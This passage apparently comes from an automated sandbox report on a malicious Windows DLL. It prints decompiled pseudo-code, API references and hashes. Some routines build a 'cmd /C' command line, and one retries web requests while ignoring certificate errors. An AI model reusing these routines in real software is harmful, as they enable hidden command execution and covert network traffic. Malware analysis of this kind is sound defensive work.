                                                        				intOrPtr* _t61;
                                                        				intOrPtr* _t63;
                                                        				intOrPtr* _t65;
                                                        				intOrPtr* _t67;
                                                        				intOrPtr* _t69;
                                                        				intOrPtr* _t71;
                                                        				intOrPtr* _t73;
                                                        				intOrPtr _t76;
                                                        				intOrPtr* _t79;
                                                        				short _t81;
                                                        				char* _t97;
                                                        				intOrPtr _t99;
                                                        				void* _t105;
                                                        				void* _t107;
                                                        				intOrPtr _t111;
                                                        
                                                        				_t81 = 0;
                                                        				_v48 = 0;
                                                        				asm("stosd");
                                                        				asm("stosd");
                                                        				asm("stosd");
                                                        				asm("stosw");
                                                        				_t49 =  *0x120a2d4; // 0x455d5a8
                                                        				_t4 = _t49 + 0x120b448; // 0x57689f0
                                                        				_t5 = _t49 + 0x120b438; // 0x9ba05972
                                                        				_t51 =  *0x120a140(_t5, 0, 4, _t4,  &_v20); // executed
                                                        				_t105 = _t51;
                                                        				if(_t105 >= 0) {
                                                        					_t53 = _v20;
                                                        					_push( &_v12);
                                                        					_push(1);
                                                        					_push( &_v32);
                                                        					_push(8);
                                                        					_t97 =  &_v48;
                                                        					_push(_t97);
                                                        					_push(_t97);
                                                        					_push(_t53); // executed
                                                        					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                                                        						_t56 =  *0x120a2d4; // 0x455d5a8
                                                        						_t30 = _t56 + 0x120b428; // 0x57689d0
                                                        						_t31 = _t56 + 0x120b458; // 0x4c96be40
                                                        						_t58 =  *0x120a114(_v12, _t31, _t30,  &_v24); // executed
                                                        						_t105 = _t58;
                                                        						_t59 = _v12;
                                                        						 *((intOrPtr*)( *_t59 + 8))(_t59);
                                                        						goto L11;
                                                        					} else {
                                                        						_t71 = _v20;
                                                        						_v16 = 0;
                                                        						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                                                        						if(_t105 >= 0) {
                                                        							_t111 = _v16;
                                                        							if(_t111 == 0) {
                                                        								_t105 = 0x80004005;
                                                        								goto L11;
                                                        							} else {
                                                        								if(_t111 <= 0) {
                                                        									L11:
                                                        									if(_t105 >= 0) {
                                                        										goto L12;
                                                        									}
                                                        								} else {
                                                        									do {
                                                        										_t73 = _v20;
                                                        										_v48 = 3;
                                                        										_v40 = _t81;
                                                        										_t107 = _t107 - 0x10;
                                                        										asm("movsd");
                                                        										asm("movsd");
                                                        										asm("movsd");
                                                        										asm("movsd");
                                                        										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
                                                        										if(_t105 < 0) {
                                                        											goto L7;
                                                        										} else {
                                                        											_t76 =  *0x120a2d4; // 0x455d5a8
                                                        											_t23 = _t76 + 0x120b428; // 0x57689d0
                                                        											_t24 = _t76 + 0x120b458; // 0x4c96be40
                                                        											_t105 =  *0x120a114(_v12, _t24, _t23,  &_v24);
                                                        											_t79 = _v12;
                                                        											 *((intOrPtr*)( *_t79 + 8))(_t79);
                                                        											if(_t105 >= 0) {
                                                        												L12:
                                                        												_t63 = _v24;
                                                        												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                                                        												if(_t105 >= 0) {
                                                        													_t99 =  *0x120a2d4; // 0x455d5a8
                                                        													_t67 = _v28;
                                                        													_t40 = _t99 + 0x120b418; // 0x214e3
                                                        													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
                                                        													_t69 = _v28;
                                                        													 *((intOrPtr*)( *_t69 + 8))(_t69);
                                                        												}
                                                        												_t65 = _v24;
                                                        												 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                        											} else {
                                                        												goto L7;
                                                        											}
                                                        										}
                                                        										goto L15;
                                                        										L7:
                                                        										_t81 = _t81 + 1;
                                                        									} while (_t81 < _v16);
                                                        									goto L11;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					L15:
                                                        					_t61 = _v20;
                                                        					 *((intOrPtr*)( *_t61 + 8))(_t61);
                                                        				}
                                                        				return _t105;
                                                        			}

                                                        APIs
                                                        • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,057689D0,01204DD1,?,?,?,?,?,?,?,?,?,?,?,01204DD1), ref: 01203752
                                                        • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,057689D0,01204DD1,?,?,?,?,?,?,?,01204DD1,00000000,00000000,00000000,006D0063), ref: 01203790
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: QueryServiceUnknown_
                                                        • String ID:
                                                        • API String ID: 2042360610-0
                                                        • Opcode ID: 90db439888ba7fed407a08db83bd5da5cc7ddeec60bd962c98cc0685553637a3
                                                        • Instruction ID: 831a1da54fbb19266cc3f1a6daa8d45c1490be0ab62eb13c4374ac7a9e196625
                                                        • Opcode Fuzzy Hash: 90db439888ba7fed407a08db83bd5da5cc7ddeec60bd962c98cc0685553637a3
                                                        • Instruction Fuzzy Hash: 7F5185B5D0021AAFCB15DFE8C888DEEB7B8FF48300B054659E905EB252D731AD45CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 75%
                                                        			E01203969(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                        				void* _v8;
                                                        				void* __esi;
                                                        				intOrPtr* _t35;
                                                        				void* _t40;
                                                        				intOrPtr* _t41;
                                                        				intOrPtr* _t43;
                                                        				intOrPtr* _t45;
                                                        				intOrPtr* _t50;
                                                        				intOrPtr* _t52;
                                                        				void* _t54;
                                                        				intOrPtr* _t55;
                                                        				intOrPtr* _t57;
                                                        				intOrPtr* _t61;
                                                        				intOrPtr* _t65;
                                                        				intOrPtr _t68;
                                                        				void* _t72;
                                                        				void* _t75;
                                                        				void* _t76;
                                                        
                                                        				_t55 = _a4;
                                                        				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                        				_a4 = 0;
                                                        				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                        				if(_t76 < 0) {
                                                        					L18:
                                                        					return _t76;
                                                        				}
                                                        				_t40 = E01204C9F(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                        				_t76 = _t40;
                                                        				if(_t76 >= 0) {
                                                        					_t61 = _a28;
                                                        					if(_t61 != 0 &&  *_t61 != 0) {
                                                        						_t52 = _v8;
                                                        						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                        					}
                                                        					if(_t76 >= 0) {
                                                        						_t43 =  *_t55;
                                                        						_t68 =  *0x120a2d4; // 0x455d5a8
                                                        						_t20 = _t68 + 0x120b1fc; // 0x740053
                                                        						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                        						if(_t76 >= 0) {
                                                        							_t76 = E01206900(_a4);
                                                        							if(_t76 >= 0) {
                                                        								_t65 = _a28;
                                                        								if(_t65 != 0 &&  *_t65 == 0) {
                                                        									_t50 = _a4;
                                                        									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                        								}
                                                        							}
                                                        						}
                                                        						_t45 = _a4;
                                                        						if(_t45 != 0) {
                                                        							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                        						}
                                                        						_t57 = __imp__#6;
                                                        						if(_a20 != 0) {
                                                        							 *_t57(_a20);
                                                        						}
                                                        						if(_a12 != 0) {
                                                        							 *_t57(_a12);
                                                        						}
                                                        					}
                                                        				}
                                                        				_t41 = _v8;
                                                        				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                        				goto L18;
                                                        			}

                                                        APIs
                                                          • Part of subcall function 01204C9F: SysAllocString.OLEAUT32(80000002), ref: 01204CF6
                                                          • Part of subcall function 01204C9F: SysFreeString.OLEAUT32(00000000), ref: 01204D5B
                                                        • SysFreeString.OLEAUT32(?), ref: 01203A48
                                                        • SysFreeString.OLEAUT32(012054F6), ref: 01203A52
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: String$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 986138563-0
                                                        • Opcode ID: 881f447f9b4549c95bd150bb1c0ebc61eef9c559d5a7e18cd3d023865d8f3506
                                                        • Instruction ID: 1b4d5562bdc17fefb5298f9723f6bdd4303d6e3ec263d1fbf928de605e5eaacf
                                                        • Opcode Fuzzy Hash: 881f447f9b4549c95bd150bb1c0ebc61eef9c559d5a7e18cd3d023865d8f3506
                                                        • Instruction Fuzzy Hash: 64317E7291015AEFCB12DF59C888CABBB79FFC97407104658FA159B252D331ED91CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 50%
                                                        			E01206566(intOrPtr* __eax, intOrPtr _a4) {
                                                        				void* _v8;
                                                        				void* _v12;
                                                        				void* _v16;
                                                        				intOrPtr* _t22;
                                                        				void* _t23;
                                                        				intOrPtr* _t24;
                                                        				intOrPtr* _t26;
                                                        				intOrPtr* _t28;
                                                        				intOrPtr* _t30;
                                                        				void* _t31;
                                                        				intOrPtr* _t32;
                                                        				intOrPtr _t42;
                                                        				intOrPtr _t45;
                                                        				intOrPtr _t48;
                                                        				void* _t51;
                                                        
                                                        				_push( &_v16);
                                                        				_t42 =  *0x120a2d4; // 0x455d5a8
                                                        				_t2 = _t42 + 0x120b468; // 0x20400
                                                        				_push(0);
                                                        				_push(__eax);
                                                        				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
                                                        				if(_t51 >= 0) {
                                                        					_t22 = _v16;
                                                        					_t45 =  *0x120a2d4; // 0x455d5a8
                                                        					_t6 = _t45 + 0x120b488; // 0xe7a1af80
                                                        					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
                                                        					_t51 = _t23;
                                                        					if(_t51 >= 0) {
                                                        						_t26 = _v12;
                                                        						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
                                                        						if(_t51 >= 0) {
                                                        							_t48 =  *0x120a2d4; // 0x455d5a8
                                                        							_t30 = _v8;
                                                        							_t12 = _t48 + 0x120b478; // 0xa4c6892c
                                                        							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
                                                        							_t51 = _t31;
                                                        							_t32 = _v8;
                                                        							 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                        						}
                                                        						_t28 = _v12;
                                                        						 *((intOrPtr*)( *_t28 + 8))(_t28);
                                                        					}
                                                        					_t24 = _v16;
                                                        					 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                        				}
                                                        				return _t51;
                                                        			}

                                                        APIs
                                                        • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 012065A3
                                                        • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 012065D4
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: Interface_ProxyQueryUnknown_
                                                        • String ID:
                                                        • API String ID: 2522245112-0
                                                        • Opcode ID: 3143fde34afc1535c95a4619d96d69c537f5125ad545aed38fc2006fbde87c2a
                                                        • Instruction ID: e328c09b08abd7def763aef654cf5ff42d729a32ae4268a632dd372d0ccaf93b
                                                        • Opcode Fuzzy Hash: 3143fde34afc1535c95a4619d96d69c537f5125ad545aed38fc2006fbde87c2a
                                                        • Instruction Fuzzy Hash: 13218175A0061AEFCB11DFA4C898D9AB779FF88704B108794E905DB316D731EE01CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 012029C4
                                                          • Part of subcall function 01203969: SysFreeString.OLEAUT32(?), ref: 01203A48
                                                        • SafeArrayDestroy.OLEAUT32(?), ref: 01202A11
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: ArraySafe$CreateDestroyFreeString
                                                        • String ID:
                                                        • API String ID: 3098518882-0
                                                        • Opcode ID: 4420945515df4b7b1e07b4384a944071307067e79064ef69b515b3e883e3f973
                                                        • Instruction ID: 5eec0d3372f4e360548627031f29f9ab71b0b245062a6984fc139ce204014ccc
                                                        • Opcode Fuzzy Hash: 4420945515df4b7b1e07b4384a944071307067e79064ef69b515b3e883e3f973
                                                        • Instruction Fuzzy Hash: E611823291010ABFDF12DF98D848AEEBBB9EB04310F008122FA04E7162D7719A55CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E0120609A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                        				struct _FILETIME _v12;
                                                        				signed int _t11;
                                                        				void* _t15;
                                                        				void* _t20;
                                                        				void* _t22;
                                                        				void* _t23;
                                                        				signed short* _t24;
                                                        
                                                        				_t22 = __edx;
                                                        				_t23 = E01203FC1(_t11, _a12);
                                                        				if(_t23 == 0) {
                                                        					_t20 = 8;
                                                        				} else {
                                                        					_t24 = _t23 + _a16 * 2;
                                                        					 *_t24 =  *_t24 & 0x00000000; // executed
                                                        					_t15 = E01205A1E(__ecx, _a4, _a8, _t23); // executed
                                                        					_t20 = _t15;
                                                        					if(_t20 == 0) {
                                                        						GetSystemTimeAsFileTime( &_v12);
                                                        						 *_t24 = 0x5f;
                                                        						_t20 = E01201E65(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
                                                        					}
                                                        					HeapFree( *0x120a290, 0, _t23);
                                                        				}
                                                        				return _t20;
                                                        			}

                                                        APIs
                                                          • Part of subcall function 01203FC1: lstrlen.KERNEL32(?,00000000,05769CD0,7742C740,012035B6,05769ED5,0120454B,0120454B,?,0120454B,?,69B25F44,E8FA7DD7,00000000), ref: 01203FC8
                                                          • Part of subcall function 01203FC1: mbstowcs.NTDLL ref: 01203FF1
                                                          • Part of subcall function 01203FC1: memset.NTDLL ref: 01204003
                                                        • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74B05520,00000008,00000014,004F0053,0576930C), ref: 012060D1
                                                        • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74B05520,00000008,00000014,004F0053,0576930C), ref: 012060FE
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                        • String ID:
                                                        • API String ID: 1500278894-0
                                                        • Opcode ID: d4df36a20eb17533e784da782138193d80ba71924d113367cdc1a884ec6016cf
                                                        • Instruction ID: dafea100f155d4e9fb159db165dc0618fe57e8a1b76574548bdd653cb721de36
                                                        • Opcode Fuzzy Hash: d4df36a20eb17533e784da782138193d80ba71924d113367cdc1a884ec6016cf
                                                        • Instruction Fuzzy Hash: 65018F3222020ABBDF239F58DC48E9A7F79FB84704F004124FA04A6197EBB1D964C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SysAllocString.OLEAUT32(01203E52), ref: 01205F69
                                                          • Part of subcall function 01203969: SysFreeString.OLEAUT32(?), ref: 01203A48
                                                        • SysFreeString.OLEAUT32(00000000), ref: 01205FA9
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: String$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 986138563-0
                                                        • Opcode ID: de0592c50797980d7cd32ae0a5761e45708192e6f5334e8f979ee80e3004d4eb
                                                        • Instruction ID: 42d8da1b4a1f1c22a2e65dd48155a33cc62f72225b3ffe3ab8693a30e39b42a8
                                                        • Opcode Fuzzy Hash: de0592c50797980d7cd32ae0a5761e45708192e6f5334e8f979ee80e3004d4eb
                                                        • Instruction Fuzzy Hash: 8E018F3651150ABFDF229FA8D808C9FBBB9EF48200B000121EA05A6122D7709A15CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E01203625(WCHAR* _a4) {
                                                        				void* __edi;
                                                        				intOrPtr _t11;
                                                        				intOrPtr _t14;
                                                        				void* _t17;
                                                        				WCHAR* _t19;
                                                        				void* _t20;
                                                        
                                                        				_t19 = E01205FBC(lstrlenW(_a4) + _t7 + 0x5c);
                                                        				if(_t19 == 0) {
                                                        					_t20 = 8;
                                                        				} else {
                                                        					_t11 =  *0x120a2d4; // 0x455d5a8
                                                        					_t5 = _t11 + 0x120b9f8; // 0x43002f
                                                        					wsprintfW(_t19, _t5, 5, _a4);
                                                        					_t14 =  *0x120a2d4; // 0x455d5a8
                                                        					_t6 = _t14 + 0x120b918; // 0x6d0063
                                                        					_t17 = E0120663C(0, _t19, _t6, 0); // executed
                                                        					_t20 = _t17;
                                                        					E012013CC(_t19);
                                                        				}
                                                        				return _t20;
                                                        			}

                                                        0x0120363b
                                                        0x0120363f
                                                        0x0120367e
                                                        0x01203641
                                                        0x01203645
                                                        0x0120364c
                                                        0x01203654
                                                        0x0120365a
                                                        0x01203662
                                                        0x0120366d
                                                        0x01203673
                                                        0x01203675
                                                        0x01203675
                                                        0x01203683

                                                        APIs
                                                        • lstrlenW.KERNEL32(74B5F710,00000000,?,01207599,?,?,74B5F710,00000000,74B5F730,?,?,?,?,0120519C,?,00000001), ref: 0120362B
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • wsprintfW.USER32 ref: 01203654
                                                          • Part of subcall function 0120663C: memset.NTDLL ref: 01206660
                                                          • Part of subcall function 0120663C: Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0120669C
                                                          • Part of subcall function 0120663C: GetLastError.KERNEL32 ref: 012066AC
                                                          • Part of subcall function 0120663C: Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 012066BD
                                                          • Part of subcall function 012013CC: RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: Wow64$EnableHeapRedirection$AllocateErrorFreeLastlstrlenmemsetwsprintf
                                                        • String ID:
                                                        • API String ID: 1174530276-0
                                                        • Opcode ID: 278b130e0895c8724f4ab91b323e074ea698a2f9e8d82e117ac4566176782ce1
                                                        • Instruction ID: 58f14a147643679dd8e1750c7ecdc51755560e443fd9f908331395344f16a199
                                                        • Opcode Fuzzy Hash: 278b130e0895c8724f4ab91b323e074ea698a2f9e8d82e117ac4566176782ce1
                                                        • Instruction Fuzzy Hash: FDF0E232210216AFD723EB68EC4CE6BBBACEB90720F414626F604C7297DB34C4408B55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                        				intOrPtr _t4;
                                                        				void* _t10;
                                                        				signed int _t11;
                                                        				void* _t13;
                                                        
                                                        				_t13 = 1;
                                                        				_t4 = _a8;
                                                        				if(_t4 == 0) {
                                                        					if(InterlockedDecrement(0x120a294) == 0) {
                                                        						E0120566B();
                                                        					}
                                                        				} else {
                                                        					if(_t4 == 1 && InterlockedIncrement(0x120a294) == 1) {
                                                        						_t10 = E0120682B(_t11, _a4); // executed
                                                        						if(_t10 != 0) {
                                                        							_t13 = 0;
                                                        						}
                                                        					}
                                                        				}
                                                        				return _t13;
                                                        			}

                                                        0x01206954
                                                        0x01206955
                                                        0x01206958
                                                        0x0120698a
                                                        0x0120698c
                                                        0x0120698c
                                                        0x0120695a
                                                        0x0120695b
                                                        0x01206970
                                                        0x01206977
                                                        0x01206979
                                                        0x01206979
                                                        0x01206977
                                                        0x0120695b
                                                        0x01206994

                                                        APIs
                                                        • InterlockedIncrement.KERNEL32(0120A294), ref: 01206962
                                                          • Part of subcall function 0120682B: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 01206840
                                                        • InterlockedDecrement.KERNEL32(0120A294), ref: 01206982
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: Interlocked$CreateDecrementHeapIncrement
                                                        • String ID:
                                                        • API String ID: 3834848776-0
                                                        • Opcode ID: c55a4110cda8e521be48b8651574f433b0914c1cd3fff71dcb8dc7841252fbee
                                                        • Instruction ID: ee4f864b92e48fe44d47e8182314d8ed201c4a0443db934211e87e3067890acb
                                                        • Opcode Fuzzy Hash: c55a4110cda8e521be48b8651574f433b0914c1cd3fff71dcb8dc7841252fbee
                                                        • Instruction Fuzzy Hash: 2CE04F3523823B9BDB336B6C9848BEE6B50BF00B44F005724A6C9D24D3CB10D8A187F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 32%
                                                        			E01205DD0(intOrPtr _a4, signed int _a8) {
                                                        				long _v8;
                                                        				long _v12;
                                                        				char _v16;
                                                        				void* _t14;
                                                        				long _t15;
                                                        				char* _t17;
                                                        				intOrPtr* _t19;
                                                        				signed int _t22;
                                                        
                                                        				_t19 = __imp__; // 0x7029e700
                                                        				_t22 =  ~_a8;
                                                        				_v12 = 0;
                                                        				asm("sbb esi, esi");
                                                        				while(1) {
                                                        					_v8 = 0;
                                                        					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
                                                        					if(_t14 != 0) {
                                                        						break;
                                                        					}
                                                        					_t15 = GetLastError();
                                                        					_v8 = _t15;
                                                        					if(_t15 != 0x2f8f) {
                                                        						if(_t15 == 0x2f00) {
                                                        							continue;
                                                        						}
                                                        					} else {
                                                        						_v16 = 0x3300;
                                                        						if(_v12 == 0) {
                                                        							_t17 =  &_v16;
                                                        							__imp__(_a4, 0x1f, _t17, 4);
                                                        							if(_t17 == 0) {
                                                        								_v8 = GetLastError();
                                                        							} else {
                                                        								_v12 = 1;
                                                        								continue;
                                                        							}
                                                        						}
                                                        					}
                                                        					L9:
                                                        					return _v8;
                                                        				}
                                                        				goto L9;
                                                        			}

                                                        0x01205dd7
                                                        0x01205de4
                                                        0x01205de6
                                                        0x01205de9
                                                        0x01205e2e
                                                        0x01205e36
                                                        0x01205e3c
                                                        0x01205e40
                                                        0x00000000
                                                        0x00000000
                                                        0x01205ded
                                                        0x01205df8
                                                        0x01205dfb
                                                        0x01205e2c
                                                        0x00000000
                                                        0x00000000
                                                        0x01205dfd
                                                        0x01205e00
                                                        0x01205e07
                                                        0x01205e0b
                                                        0x01205e14
                                                        0x01205e1c
                                                        0x01205e4a
                                                        0x01205e1e
                                                        0x01205e1e
                                                        0x00000000
                                                        0x01205e1e
                                                        0x01205e1c
                                                        0x01205e07
                                                        0x01205e4d
                                                        0x01205e54
                                                        0x01205e54
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: ErrorLast
                                                        • String ID:
                                                        • API String ID: 1452528299-0
                                                        • Opcode ID: b5b520f1fed1c07a8ce980a09650fc2e5298ae35d09bf1cdc2f8697faab86f3e
                                                        • Instruction ID: 34e09a65eb430499c9ec1076e21cf09ad80e6b4e93e3fcadbe6be5a80714af86
                                                        • Opcode Fuzzy Hash: b5b520f1fed1c07a8ce980a09650fc2e5298ae35d09bf1cdc2f8697faab86f3e
                                                        • Instruction Fuzzy Hash: B7018435910119FBDF229F99DC4CD9EBFB8EB84740F10C266EA45E2186D7708A40CF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 92%
                                                        			E01206FEA(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                                                        				signed int _v5;
                                                        				signed int _v12;
                                                        				void* _t32;
                                                        				signed int _t37;
                                                        				signed int _t39;
                                                        				signed char _t45;
                                                        				void* _t49;
                                                        				char* _t51;
                                                        				signed int _t65;
                                                        				signed int _t66;
                                                        				signed int _t69;
                                                        
                                                        				_v12 = _v12 & 0x00000000;
                                                        				_t69 = __eax;
                                                        				_t32 = RtlAllocateHeap( *0x120a290, 0, __eax << 2); // executed
                                                        				_t49 = _t32;
                                                        				if(_t49 == 0) {
                                                        					_v12 = 8;
                                                        				} else {
                                                        					 *_a8 = _t49;
                                                        					do {
                                                        						_t45 =  *_a4;
                                                        						asm("cdq");
                                                        						_t65 = 0x64;
                                                        						_t37 = (_t45 & 0x000000ff) / _t65;
                                                        						_v5 = _t37;
                                                        						if(_t37 != 0) {
                                                        							 *_t49 = _t37 + 0x30;
                                                        							_t49 = _t49 + 1;
                                                        							_t45 = _t45 + _t37 * 0x9c;
                                                        						}
                                                        						asm("cdq");
                                                        						_t66 = 0xa;
                                                        						_t39 = (_t45 & 0x000000ff) / _t66;
                                                        						if(_t39 != 0 || _v5 != _t39) {
                                                        							 *_t49 = _t39 + 0x30;
                                                        							_t49 = _t49 + 1;
                                                        							_t45 = _t45 + _t39 * 0xf6;
                                                        						}
                                                        						_a4 = _a4 + 1;
                                                        						 *_t49 = _t45 + 0x30;
                                                        						 *(_t49 + 1) = 0x2c;
                                                        						_t49 = _t49 + 2;
                                                        						_t69 = _t69 - 1;
                                                        					} while (_t69 != 0);
                                                        					_t51 = _t49 - 1;
                                                        					 *_a12 = _t51 -  *_a8;
                                                        					 *_t51 = 0;
                                                        				}
                                                        				return _v12;
                                                        			}

                                                        0x01206fef
                                                        0x01206ff4
                                                        0x01207002
                                                        0x01207008
                                                        0x0120700c
                                                        0x0120707d
                                                        0x0120700e
                                                        0x01207012
                                                        0x01207015
                                                        0x01207018
                                                        0x0120701f
                                                        0x01207020
                                                        0x01207021
                                                        0x01207025
                                                        0x01207028
                                                        0x0120702f
                                                        0x01207035
                                                        0x01207036
                                                        0x01207036
                                                        0x0120703d
                                                        0x0120703e
                                                        0x0120703f
                                                        0x01207043
                                                        0x0120704f
                                                        0x01207055
                                                        0x01207056
                                                        0x01207056
